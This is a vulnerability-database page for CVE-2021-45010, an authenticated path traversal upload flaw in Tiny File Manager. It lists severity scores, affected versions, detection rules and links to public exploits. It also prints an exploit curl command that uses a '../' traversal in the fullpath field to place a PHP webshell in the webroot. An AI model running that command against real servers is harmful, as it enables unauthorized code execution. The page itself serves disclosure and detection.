CVE-2021-45010
published 2022-03-15CVE-2021-45010: A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid…
PriorityP179high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
70.08%
99.3th percentile
A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prasathmani | tiny_file_manager | <= 2.4.7 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell"↗
- →Detect multipart POST requests to tinyfilemanager.php (or index.php) where the 'fullpath' field contains path traversal sequences (e.g., '../../') pointing outside the intended upload directory, especially targeting webroot paths. ↗
- →Alert on PHP file uploads via the Tiny File Manager upload endpoint (?p=&upload) where the uploaded filename ends in .php — indicative of webshell staging. ↗
- →Monitor for POST requests to the Tiny File Manager upload endpoint with 'type=upload&uploadurl=<external URL>&ajax=true' body, used to trigger full path disclosure prior to exploitation. ↗
- →Detect newly created PHP files in the webroot with names matching the pattern 'shell[0-9]+.php', which are dropped by the exploit as remote command execution webshells. ↗
- →Look for subsequent GET/POST requests to the dropped shell with a 'cmd=' query parameter or POST body, indicating active webshell interaction post-upload. ↗
- →The exploit targets Tiny File Manager versions before 2.4.7 (specifically demonstrated against 2.4.6); flag any internet-exposed instances of tinyfilemanager.php at these versions. ↗
- ·Exploitation requires valid authenticated user credentials on the Tiny File Manager instance; unauthenticated attackers cannot directly exploit this vulnerability. ↗
- ·The exploit first performs a full path disclosure step (via an intentionally invalid uploadurl) to determine the webroot before attempting the traversal upload; detections should cover both the recon and upload phases. ↗
- ·If the webroot cannot be leaked, the exploit falls back to the default path /var/www/html; detection rules should also cover traversal attempts targeting this default path. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/166330/Tiny-File-Manager-2.4.6-Shell-Upload.htmlhttps://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/https://github.com/febinrev/tinyfilemanager-2.4.3-exploit/raw/main/exploit.shhttps://github.com/prasathmani/tinyfilemanager/commit/2046bbde72ed76af0cfdcae082de629bcc4b44c7https://github.com/prasathmani/tinyfilemanager/pull/636https://github.com/prasathmani/tinyfilemanager/pull/636/files/a93fc321a3c89fdb9bee860bf6df5d89083298d1https://raw.githubusercontent.com/febinrev/tinyfilemanager-2.4.6-exploit/main/exploit.shhttps://sploitus.com/exploit?id=1337DAY-ID-37364&utm_source=rss&utm_medium=rsshttp://packetstormsecurity.com/files/166330/Tiny-File-Manager-2.4.6-Shell-Upload.htmlhttps://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/https://github.com/febinrev/tinyfilemanager-2.4.3-exploit/raw/main/exploit.shhttps://github.com/prasathmani/tinyfilemanager/commit/2046bbde72ed76af0cfdcae082de629bcc4b44c7https://github.com/prasathmani/tinyfilemanager/pull/636https://github.com/prasathmani/tinyfilemanager/pull/636/files/a93fc321a3c89fdb9bee860bf6df5d89083298d1https://raw.githubusercontent.com/febinrev/tinyfilemanager-2.4.6-exploit/main/exploit.shhttps://sploitus.com/exploit?id=1337DAY-ID-37364&utm_source=rss&utm_medium=rss
2022-03-15
Published